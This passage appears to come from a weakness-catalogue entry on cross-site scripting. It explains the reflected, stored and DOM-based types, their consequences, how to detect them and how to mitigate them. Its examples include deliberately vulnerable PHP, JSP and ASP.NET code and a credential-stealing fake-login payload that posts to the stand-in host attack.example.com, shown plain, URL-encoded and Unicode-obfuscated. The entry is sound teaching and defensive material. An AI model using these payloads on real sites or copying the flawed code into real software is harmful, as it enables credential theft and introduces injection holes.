5. Since the script comes from a web page that was sent by the web server, the victim's web browser executes the malicious script in the context of the web server's domain.

6. This effectively violates the intention of the web browser's same-origin policy, which states that scripts in one domain should not be able to access resources or run code in a different domain.

There are three main kinds of XSS:

Type 1: Reflected XSS (or Non-Persistent)

The server reads data directly from the HTTP request and reflects it back in the HTTP response. Reflected XSS exploits occur when an attacker causes a victim to supply dangerous content to a vulnerable web application, which is then reflected back to the victim and executed by the web browser. The most common mechanism for delivering malicious content is to include it as a parameter in a URL that is posted publicly or e-mailed directly to the victim. URLs constructed in this manner constitute the core of many phishing schemes, whereby an attacker convinces a victim to visit a URL that refers to a vulnerable site. After the site reflects the attacker's content back to the victim, the content is executed by the victim's browser.

Type 2: Stored XSS (or Persistent)

The application stores dangerous data in a database, message forum, visitor log, or other trusted data store. At a later time, the dangerous data is subsequently read back into the application and included in dynamic content. From an attacker's perspective, the optimal place to inject malicious content is in an area that is displayed to either many users or particularly interesting users. Interesting users typically have elevated privileges in the application or interact with sensitive data that is valuable to the attacker. If one of these users executes malicious content, the attacker may be able to perform privileged operations on behalf of the user or gain access to sensitive data belonging to the user. For example, the attacker might inject XSS into a log message, which might not be handled properly when an administrator views the logs.

Type 0: DOM-Based XSS

In DOM-based XSS, the client performs the injection of XSS into the page; in the other types, the server performs the injection. DOM-based XSS generally involves server-controlled, trusted script that is sent to the client, such as Javascript that performs sanity checks on a form before the user submits it. If the server-supplied script processes user-supplied data and then injects it back into the web page (such as with dynamic HTML), then DOM-based XSS is possible.

Once the malicious script is injected, the attacker can perform a variety of malicious activities. The attacker could transfer private information, such as cookies that may include session information, from the victim's machine to the attacker. The attacker could send malicious requests to a web site on behalf of the victim, which could be especially dangerous to the site if the victim has administrator privileges to manage that site. Phishing attacks could be used to emulate trusted web sites and trick the victim into entering a password, allowing the attacker to compromise the victim's account on that web site. Finally, the script could exploit a vulnerability in the web browser itself possibly taking over the victim's machine, sometimes referred to as "drive-by hacking."

In many cases, the attack can be launched without the victim even being aware of it. Even with careful users, attackers frequently use a variety of methods to encode the malicious portion of the attack, such as URL encoding or Unicode, so the request looks less suspicious.

+ Alternate Terms
XSS
CSS:

"CSS" was once used as the acronym for this problem, but this could cause confusion with "Cascading Style Sheets," so usage of this acronym has declined significantly.

+ Time of Introduction
  • Architecture and Design
  • Implementation
+ Applicable Platforms

Languages

Language-independent

Architectural Paradigms

Web-based: (Often)

Technology Classes

Web-Server: (Often)

Platform Notes

XSS flaws are very common in web applications since they require a great deal of developer discipline to avoid them.

+ Common Consequences
ScopeEffect
Access Control
Confidentiality

Technical Impact: Bypass protection mechanism; Read application data

The most common attack performed with cross-site scripting involves the disclosure of information stored in user cookies. Typically, a malicious user will craft a client-side script, which -- when parsed by a web browser -- performs some activity (such as sending all site cookies to a given E-mail address). This script will be loaded and run by each user visiting the web site. Since the site requesting to run the script has access to the cookies in question, the malicious script does also.

Integrity
Confidentiality
Availability

Technical Impact: Execute unauthorized code or commands

In some circumstances it may be possible to run arbitrary code on a victim's computer when cross-site scripting is combined with other flaws.

Confidentiality
Integrity
Availability
Access Control

Technical Impact: Execute unauthorized code or commands; Bypass protection mechanism; Read application data

The consequence of an XSS attack is the same regardless of whether it is stored or reflected. The difference is in how the payload arrives at the server.

XSS can cause a variety of problems for the end user that range in severity from an annoyance to complete account compromise. Some cross-site scripting vulnerabilities can be exploited to manipulate or steal cookies, create requests that can be mistaken for those of a valid user, compromise confidential information, or execute malicious code on the end user systems for a variety of nefarious purposes. Other damaging attacks include the disclosure of end user files, installation of Trojan horse programs, redirecting the user to some other page or site, running "Active X" controls (under Microsoft Internet Explorer) from sites that a user perceives as trustworthy, and modifying presentation of content.

+ Likelihood of Exploit

High to Very High

+ Enabling Factors for Exploitation

Cross-site scripting attacks may occur anywhere that possibly malicious users are allowed to post unregulated material to a trusted web site for the consumption of other valid users, commonly on places such as bulletin-board web sites which provide web based mailing list-style functionality.

Stored XSS got its start with web sites that offered a "guestbook" to visitors. Attackers would include JavaScript in their guestbook entries, and all subsequent visitors to the guestbook page would execute the malicious code. As the examples demonstrate, XSS vulnerabilities are caused by code that includes unvalidated data in an HTTP response.

+ Detection Methods

Automated Static Analysis

Use automated static analysis tools that target this type of weakness. Many modern techniques use data flow analysis to minimize the number of false positives. This is not a perfect solution, since 100% accuracy and coverage are not feasible, especially when multiple components are involved.

Effectiveness: Moderate

Black Box

Use the XSS Cheat Sheet [R.79.6] or automated test-generation tools to help launch a wide variety of attacks against your web application. The Cheat Sheet contains many subtle XSS variations that are specifically targeted against weak XSS defenses.

Effectiveness: Moderate

With Stored XSS, the indirection caused by the data store can make it more difficult to find the problem. The tester must first inject the XSS string into the data store, then find the appropriate application functionality in which the XSS string is sent to other users of the application. These are two distinct steps in which the activation of the XSS can take place minutes, hours, or days after the XSS was originally injected into the data store.

+ Demonstrative Examples

Example 1

This code displays a welcome message on a web page based on the HTTP GET username parameter. This example covers a Reflected XSS (Type 1) scenario.

(Bad Code)
Example Language: PHP 
$username = $_GET['username'];
echo '<div class="header"> Welcome, ' . $username . '</div>';

Because the parameter can be arbitrary, the url of the page could be modified so $username contains scripting syntax, such as

(Attack)
 
http://trustedSite.example.com/welcome.php?username=<Script Language="Javascript">alert("You've been attacked!");</Script>

This results in a harmless alert dialogue popping up. Initially this might not appear to be much of a vulnerability. After all, why would someone enter a URL that causes malicious code to run on their own computer? The real danger is that an attacker will create the malicious URL, then use e-mail or social engineering tricks to lure victims into visiting a link to the URL. When victims click the link, they unwittingly reflect the malicious content through the vulnerable web application back to their own computers.

More realistically, the attacker can embed a fake login box on the page, tricking the user into sending his password to the attacker:

(Attack)
 
http://trustedSite.example.com/welcome.php?username=<div id="stealPassword">Please Login:<form name="input" action="http://attack.example.com/stealPassword.php" method="post">Username: <input type="text" name="username" /><br/>Password: <input type="password" name="password" /><input type="submit" value="Login" /></form></div>

If a user clicks on this link then Welcome.php will generate the following HTML and send it to the user's browser:

(Result)
 
<div class="header"> Welcome,
<div id="stealPassword">Please Login:
<form name="input" action="attack.example.com/stealPassword.php" method="post">
Username: <input type="text" name="username" />
<br/>
Password: <input type="password" name="password" />
<input type="submit" value="Login" />
</form>
</div>
</div>

The trustworthy domain of the URL may falsely assure the user that it is OK to follow the link. However, an astute user may notice the suspicious text appended to the URL. An attacker may further obfuscate the URL (the following example links are broken into multiple lines for readability):

(Attack)
 
trustedSite.example.com/welcome.php?username=%3Cdiv+id%3D%22
stealPassword%22%3EPlease+Login%3A%3Cform+name%3D%22input
%22+action%3D%22http%3A%2F%2Fattack.example.com%2FstealPassword.php
%22+method%3D%22post%22%3EUsername%3A+%3Cinput+type%3D%22text
%22+name%3D%22username%22+%2F%3E%3Cbr%2F%3EPassword%3A
+%3Cinput+type%3D%22password%22+name%3D%22password%22
+%2F%3E%3Cinput+type%3D%22submit%22+value%3D%22Login%22
+%2F%3E%3C%2Fform%3E%3C%2Fdiv%3E%0D%0A

The same attack string could also be obfuscated as:

(Attack)
 
trustedSite.example.com/welcome.php?username=<script+type="text/javascript">
document.write('\u003C\u0064\u0069\u0076\u0020\u0069\u0064\u003D\u0022\u0073
\u0074\u0065\u0061\u006C\u0050\u0061\u0073\u0073\u0077\u006F\u0072\u0064
\u0022\u003E\u0050\u006C\u0065\u0061\u0073\u0065\u0020\u004C\u006F\u0067
\u0069\u006E\u003A\u003C\u0066\u006F\u0072\u006D\u0020\u006E\u0061\u006D
\u0065\u003D\u0022\u0069\u006E\u0070\u0075\u0074\u0022\u0020\u0061\u0063
\u0074\u0069\u006F\u006E\u003D\u0022\u0068\u0074\u0074\u0070\u003A\u002F
\u002F\u0061\u0074\u0074\u0061\u0063\u006B\u002E\u0065\u0078\u0061\u006D
\u0070\u006C\u0065\u002E\u0063\u006F\u006D\u002F\u0073\u0074\u0065\u0061
\u006C\u0050\u0061\u0073\u0073\u0077\u006F\u0072\u0064\u002E\u0070\u0068
\u0070\u0022\u0020\u006D\u0065\u0074\u0068\u006F\u0064\u003D\u0022\u0070
\u006F\u0073\u0074\u0022\u003E\u0055\u0073\u0065\u0072\u006E\u0061\u006D
\u0065\u003A\u0020\u003C\u0069\u006E\u0070\u0075\u0074\u0020\u0074\u0079
\u0070\u0065\u003D\u0022\u0074\u0065\u0078\u0074\u0022\u0020\u006E\u0061
\u006D\u0065\u003D\u0022\u0075\u0073\u0065\u0072\u006E\u0061\u006D\u0065
\u0022\u0020\u002F\u003E\u003C\u0062\u0072\u002F\u003E\u0050\u0061\u0073
\u0073\u0077\u006F\u0072\u0064\u003A\u0020\u003C\u0069\u006E\u0070\u0075
\u0074\u0020\u0074\u0079\u0070\u0065\u003D\u0022\u0070\u0061\u0073\u0073
\u0077\u006F\u0072\u0064\u0022\u0020\u006E\u0061\u006D\u0065\u003D\u0022
\u0070\u0061\u0073\u0073\u0077\u006F\u0072\u0064\u0022\u0020\u002F\u003E
\u003C\u0069\u006E\u0070\u0075\u0074\u0020\u0074\u0079\u0070\u0065\u003D
\u0022\u0073\u0075\u0062\u006D\u0069\u0074\u0022\u0020\u0076\u0061\u006C
\u0075\u0065\u003D\u0022\u004C\u006F\u0067\u0069\u006E\u0022\u0020\u002F
\u003E\u003C\u002F\u0066\u006F\u0072\u006D\u003E\u003C\u002F\u0064\u0069\u0076\u003E\u000D');</script>

Both of these attack links will result in the fake login box appearing on the page, and users are more likely to ignore indecipherable text at the end of URLs.

Example 2

This example also displays a Reflected XSS (Type 1) scenario.

The following JSP code segment reads an employee ID, eid, from an HTTP request and displays it to the user.

(Bad Code)
Example Language: JSP 
<% String eid = request.getParameter("eid"); %>
...
Employee ID: <%= eid %>

The following ASP.NET code segment reads an employee ID number from an HTTP request and displays it to the user.

(Bad Code)
Example Language: ASP.NET 
...
protected System.Web.UI.WebControls.TextBox Login;
protected System.Web.UI.WebControls.Label EmployeeID;
...
EmployeeID.Text = Login.Text;
... (HTML follows) ...
<p><asp:label id="EmployeeID" runat="server" /></p>
...

The code in this example operates correctly if the Employee ID variable contains only standard alphanumeric text. If it has a value that includes meta-characters or source code, then the code will be executed by the web browser as it displays the HTTP response.

Example 3

This example covers a Stored XSS (Type 2) scenario.

The following JSP code segment queries a database for an employee with a given ID and prints the corresponding employee's name.

(Bad Code)
Example Language: JSP 
<%
...
Statement stmt = conn.createStatement();
ResultSet rs = stmt.executeQuery("select * from emp where id="+eid);
if (rs != null) {
rs.next();
String name = rs.getString("name");
%>

Employee Name: <%= name %>

The following ASP.NET code segment queries a database for an employee with a given employee ID and prints the name corresponding with the ID.

(Bad Code)
Example Language: ASP.NET 
protected System.Web.UI.WebControls.Label EmployeeName;
...
string query = "select * from emp where id=" + eid;
sda = new SqlDataAdapter(query, conn);
sda.Fill(dt);
string name = dt.Rows[0]["Name"];
...
EmployeeName.Text = name;

This code can appear less dangerous because the value of name is read from a database, whose contents are apparently managed by the application. However, if the value of name originates from user-supplied data, then the database can be a conduit for malicious content. Without proper input validation on all data stored in the database, an attacker can execute malicious commands in the user's web browser.

Example 4

The following example consists of two separate pages in a web application, one devoted to creating user accounts and another devoted to listing active users currently logged in. It also displays a Stored XSS (Type 2) scenario.

CreateUser.php

(Bad Code)
Example Language: PHP 
$username = mysql_real_escape_string($username);
$fullName = mysql_real_escape_string($fullName);
$query = sprintf('Insert Into users (username,password) Values ("%s","%s","%s")', $username, crypt($password),$fullName) ;
mysql_query($query);
/.../

The code is careful to avoid a SQL injection attack (CWE-89) but does not stop valid HTML from being stored in the database. This can be exploited later when ListUsers.php retrieves the information:

ListUsers.php

(Bad Code)
 
$query = 'Select * From users Where loggedIn=true';
$results = mysql_query($query);
if (!$results) {
exit;
}
//Print list of users to page
echo '<div id="userlist">Currently Active Users:';
while ($row = mysql_fetch_assoc($results)) {
echo '<div class="userNames">'.$row['fullname'].'</div>';
}
echo '</div>';

The attacker can set his name to be arbitrary HTML, which will then be displayed to all visitors of the Active Users page. This HTML can, for example, be a password stealing Login message.

+ Observed Examples
ReferenceDescription
Chain: protection mechanism failure allows XSS
Chain: only checks "javascript:" tag
Chain: only removes SCRIPT tags, enabling XSS
Reflected XSS using the PATH_INFO in a URL
Reflected XSS not properly handled when generating an error message
Reflected XSS sent through email message.
Stored XSS in a security product.
Stored XSS using a wiki page.
Stored XSS in a guestbook application.
Stored XSS in a guestbook application using a javascript: URI in a bbcode img tag.
Chain: library file is not protected against a direct request (CWE-425), leading to reflected XSS.
+ Potential Mitigations

Phase: Architecture and Design

Strategy: Libraries or Frameworks

Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.

Examples of libraries and frameworks that make it easier to generate properly encoded output include Microsoft's Anti-XSS library, the OWASP ESAPI Encoding module, and Apache Wicket.

Phases: Implementation; Architecture and Design

Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies.

For any data that will be output to another web page, especially any data that was received from external inputs, use the appropriate encoding on all non-alphanumeric characters.

Parts of the same output document may require different encodings, which will vary depending on whether the output is in the:

  • HTML body

  • Element attributes (such as src="XYZ")

  • URIs

  • JavaScript sections

  • Cascading Style Sheets and style property

etc. Note that HTML Entity Encoding is only appropriate for the HTML body.

Consult the XSS Prevention Cheat Sheet [R.79.16] for more details on the types of encoding and escaping that are needed.

Phases: Architecture and Design; Implementation

Strategy: Identify and Reduce Attack Surface

Understand all the potential areas where untrusted inputs can enter your software: parameters or arguments, cookies, anything read from the network, environment variables, reverse DNS lookups, query results, request headers, URL components, e-mail, files, filenames, databases, and any external systems that provide data to the application. Remember that such inputs may be obtained indirectly through API calls.

Effectiveness: Limited

This technique has limited effectiveness, but can be helpful when it is possible to store client state and sensitive information on the server side instead of in cookies, headers, hidden form fields, etc.

Phase: Architecture and Design

For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.

Phase: Architecture and Design

Strategy: Parameterization

If available, use structured mechanisms that automatically enforce the separation between data and code. These mechanisms may be able to provide the relevant quoting, encoding, and validation automatically, instead of relying on the developer to provide this capability at every point where output is generated.

Phase: Implementation

Strategy: Output Encoding

Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component.

The problem of inconsistent output encodings often arises in web pages. If an encoding is not specified in an HTTP header, web browsers often guess about which encoding is being used. This can open up the browser to subtle XSS attacks.

Phase: Implementation

With Struts, write all data from form beans with the bean's filter attribute set to true.

Phase: Implementation

Strategy: Identify and Reduce Attack Surface

To help mitigate XSS attacks against the user's session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user's session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all browsers. More importantly, XMLHTTPRequest and other powerful browser technologies provide read access to HTTP headers, including the Set-Cookie header in which the HttpOnly flag is set.

Effectiveness: Defense in Depth

Phase: Implementation

Strategy: Input Validation

Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a whitelist of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.

When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue."

Do not rely exclusively on looking for malicious or malformed inputs (i.e., do not rely on a blacklist). A blacklist is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, blacklists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.

When dynamically constructing web pages, use stringent whitelists that limit the character set based on the expected value of the parameter in the request. All input should be validated and cleansed, not just parameters that the user is supposed to specify, but all data in the request, including hidden fields, cookies, headers, the URL itself, and so forth. A common mistake that leads to continuing XSS vulnerabilities is to validate only fields that are expected to be redisplayed by the site. It is common to see data from the request that is reflected by the application server or the application that the development team did not anticipate. Also, a field that is not currently reflected may be used by a future developer. Therefore, validating ALL parts of the HTTP request is recommended.

Note that proper output encoding, escaping, and quoting is the most effective solution for preventing XSS, although input validation may provide some defense-in-depth. This is because it effectively limits what will appear in output. Input validation will not always prevent XSS, especially if you are required to support free-form text fields that could contain arbitrary characters. For example, in a chat application, the heart emoticon ("<3") would likely pass the validation step, since it is commonly used. However, it cannot be directly inserted into the web page because it contains the "<" character, which would need to be escaped or otherwise handled. In this case, stripping the "<" might reduce the risk of XSS, but it would produce incorrect behavior because the emoticon would not be recorded. This might seem to be a minor inconvenience, but it would be more important in a mathematical forum that wants to represent inequalities.

Even if you make a mistake in your validation (such as forgetting one out of 100 input fields), appropriate encoding is still likely to protect you from injection-based attacks. As long as it is not done in isolation, input validation is still a useful technique, since it may significantly reduce your attack surface, allow you to detect some attacks, and provide other security benefits that proper encoding does not address.

Ensure that you perform input validation at well-defined interfaces within the application. This will help protect the application even if a component is reused or moved elsewhere.

Phase: Architecture and Design

Strategy: Enforcement by Conversion

When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs.

Phase: Operation

Strategy: Firewall

Use an application firewall that can detect attacks against this weakness. It can be beneficial in cases in which the code cannot be fixed (because it is controlled by a third party), as an emergency prevention measure while more comprehensive software assurance measures are applied, or to provide defense in depth.

Effectiveness: Moderate

An application firewall might not cover all possible input vectors. In addition, attack techniques might be available to bypass the protection mechanism, such as using malformed inputs that can still be processed by the component that receives those inputs. Depending on functionality, an application firewall might inadvertently reject or modify legitimate requests. Finally, some manual effort may be required for customization.

Phases: Operation; Implementation

Strategy: Environment Hardening

When using PHP, configure the application so that it does not use register_globals. During implementation, develop the application so that it does not rely on this feature, but be wary of implementing a register_globals emulation that is subject to weaknesses such as CWE-95, CWE-621, and similar issues.

+ Background Details

Same Origin Policy

The same origin policy states that browsers should limit the resources accessible to scripts running on a given web site, or "origin", to the resources associated with that web site on the client-side, and not the client-side resources of any other sites or "origins". The goal is to prevent one site from being able to modify or read the contents of an unrelated site. Since the World Wide Web involves interactions between many sites, this policy is important for browsers to enforce.

Domain

The Domain of a website when referring to XSS is roughly equivalent to the resources associated with that website on the client-side of the connection. That is, the domain can be thought of as all resources the browser is storing for the user's interactions with this particular site.